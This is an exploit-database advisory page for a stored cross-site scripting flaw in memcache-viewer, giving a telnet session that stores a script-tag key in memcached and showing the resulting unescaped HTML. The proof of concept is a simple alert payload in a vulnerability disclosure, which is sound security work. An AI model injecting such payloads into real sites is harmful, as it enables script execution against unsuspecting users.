header-logo
Suggest Exploit
vendor:
memcache-viewer
by:
HaHwul
8,8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: memcache-viewer
Affected Version From: Latest commit
Affected Version To: Latest commit
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian [wheezy]
2017

memcache-viewer – Stored XSS

This program does not filter filtering on the special character when expressing the data from memcached on the web. When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.

Mitigation:

Update to the latest version
Source

Exploit-DB raw data:

# Exploit Title: memcache-viewer - Stored XSS
# Date: 2017-02-24
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]

### Vulnerability 
This program does not filter filtering on the special character when expressing the data from memcached on the web.
When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.

### Example Attack code
1. Send Payload(XSS Code) after Connecting to memcached server.
#> telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

add hacked<script>alert(45)</script> 0 900 2
45
STORED

2. Insert data through memcached related 3rd party application.

### Result
Access index.php after memcache-viewer login
DOM Area in index.php
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>

Navigation

Suggest Exploit

Services By CQR